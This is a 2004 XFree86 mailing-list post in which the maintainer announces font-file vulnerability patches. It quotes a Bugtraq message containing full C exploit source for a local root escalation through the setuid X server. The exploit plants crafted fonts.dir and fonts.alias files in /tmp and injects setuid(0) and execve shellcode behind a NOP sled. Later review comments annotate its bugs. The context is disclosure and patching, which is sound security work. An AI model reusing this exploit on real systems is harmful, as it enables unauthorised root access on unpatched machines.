Patches for this and related vulnerabilities have been committed to all of the release branches of the XFree86 CVS repository, and to the trunk. A source patch relative to 4.3.0.1 can be found at <ftp://ftp.xfree86.org/pub/XFree86/4.3.0/fixes/fontfile.diff>. Once things have settled, I'm planning to add snapshot tags to each branch. This will give a set of definite version numbers where this is fixed. David -- http://www.XFree86.org/~dawes On Thu, Feb 12, 2004 at 04:50:51PM -0500, Scott Gifford wrote: >This was posted on Bugtraq earlier today, and I thought it might be of >interest here. > > >From: Bender <bender2@xxxxxxxxxxxxxxxx> >Subject: XFree86 vulnerability exploit >To: bugtraq@xxxxxxxxxxxxxxxxx >Date: Wed, 11 Feb 2004 11:09:00 +0000 > >Hello > >Below you can find a exploit for latest bug in XFree86 sofware. >Tested on some versions of RedHat Linux (mainly 7.0). > >regards >Bender > >/* For educational purposes only */ >/* Brought to you by bender2@xxxxxxxxxxxx 11.10.2004 */ > >#include <fcntl.h> /* NOTE(review): stdio.h, string.h and unistd.h are not included; printf, strcpy, strcat, strlen, write, close and execle are used through implicit declarations, which C99 removed */ > >#define NOPNUM 8000 /* size of the NOP sled built at buffer+2000 (minus the payload length) */ >#define ADRNUM 1058 /* number of bytes of the guessed return address repeated into the fonts.alias line */ > >/* shellcode from LSD */ /* NOTE(review): the per-instruction comments below were kept from the LSD /bin//sh payload and do not all match the bytes actually used here; see the two pushl lines */ >char setuidcode[]= /* 8 bytes */ > "\x33\xc0" /* xorl %eax,%eax */ > "\x31\xdb" /* xorl %ebx,%ebx */ > "\xb0\x17" /* movb $0x17,%al */ /* 0x17 = 23 = setuid on i386 Linux, so this is setuid(0) */ > "\xcd\x80" /* int $0x80 */ >; > >char shellcode[]= /* 24 bytes */ > "\x31\xc0" /* xorl %eax,%eax */ > "\x50" /* pushl %eax */ > "\x68""//id" /* pushl $0x68732f2f */ /* NOTE(review): these bytes push "//id" (0x64692f2f), not "//sh" as the comment says */ > "\x68""/tmp" /* pushl $0x6e69622f */ /* NOTE(review): these bytes push "/tmp" (0x706d742f), not "/bin"; the path built on the stack is "/tmp//id", so as posted this executes /tmp//id, not a shell */ > "\x89\xe3" /* movl %esp,%ebx */ /* %ebx = path */ > "\x50" /* pushl %eax */ /* NULL terminator of argv */ > "\x53" /* pushl %ebx */ /* argv[0] = path */ > "\x89\xe1" /* movl %esp,%ecx */ /* %ecx = argv */ > "\x99" /* cdql */ /* NOTE(review): 0x99 is cltd/cdq; presumably used only to zero %edx (envp) */ > "\xb0\x0b" /* movb $0x0b,%al */ /* 0x0b = 11 = execve */ > "\xcd\x80" /* int $0x80 */ >; > >char jump[]= /* NOTE(review): this data array is called as a function below to read %esp; that only works when data is executable (no NX/exec-shield), consistent with the RedHat 7.0 target */ > "\x8b\xc4" /* movl %esp,%eax */ > "\xc3" /* ret */ >; > > >main(int argc,char **argv){ /* NOTE(review): implicit int return type and no return statement; argc and argv are unused */ > char buffer[20000],adr[4],pch[4],*b,*envp[4]; /* pch is never used */ > int i,fd; > > > *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+16000; /* NOTE(review): leaked stack pointer plus a fixed 16000-byte offset is the guessed address into the NOP sled; type-punning a char[4] through unsigned long* is strictly UB but works on i386 */ > > envp[0]=&buffer[2000]; /* NOTE(review): the payload built later at buffer+2000 is passed as the X server's only environment string, presumably so it lands on the server's stack */ > envp[1]=0; > > printf("adr: 0x%x\n",adr+12000); /* NOTE(review): %x with a pointer argument is UB, and adr+12000 points far outside the 4-byte adr array; the printed value is not the address that was written into adr */ > > b=buffer; > strcpy(buffer,"1\n"); > 
strcat(buffer,"aaaa.pcf -aaaa-fixed-small-a-semicondensed--1-1-1-1-a-1-iso1111-1\n"); /* fonts.dir: one entry mapping aaaa.pcf to an XLFD name */ > fd=open("/tmp/fonts.dir",O_CREAT|O_WRONLY,0666); /* NOTE(review): open/write return values are unchecked, this descriptor is never closed, and O_TRUNC is missing, so leftover bytes of a pre-existing longer file survive past what is written */ > write(fd,buffer,strlen(buffer)); > > for(i=0;i<ADRNUM;i++) *b++=adr[i%4]; /* overwrite buffer from the start with the guessed address repeated ADRNUM times; this becomes the single fonts.alias line */ > *b++='\n'; > > fd=open("/tmp/fonts.alias",O_CREAT|O_WRONLY,0666); /* NOTE(review): same unchecked open/write and missing O_TRUNC as above */ > write(fd,buffer,strlen(buffer)); > close(fd); > > b=&buffer[2000]; > >for(i=0;i<NOPNUM-strlen(setuidcode)-strlen(setuidcode)-strlen(shellcode);i++) /* NOTE(review): strlen(setuidcode) is subtracted twice, probably a typo for setuidcode+shellcode; harmless, the sled is just 8 bytes shorter */ >*b++=0x90; > for(i=0;i<strlen(setuidcode);i++) *b++=setuidcode[i]; > for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i]; > *b=0; > > execle("/usr/bin/X11/X","X",":0","-fp","/tmp",0,envp); /* NOTE(review): starts the setuid X server with font path /tmp so it parses the crafted fonts.dir/fonts.alias; the variadic terminator should be (char *)0 rather than a bare 0 for portability */ >} > > -- >bender2@xxxxxxxxxxxxxxxx >SDF Public Access UNIX System - http://sdf.lonestar.org >_______________________________________________ >XFree86 mailing list >XFree86@xxxxxxxxxxx >http://XFree86.Org/mailman/listinfo/xfree86 > _______________________________________________ XFree86 mailing list XFree86@xxxxxxxxxxx http://XFree86.Org/mailman/listinfo/xfree86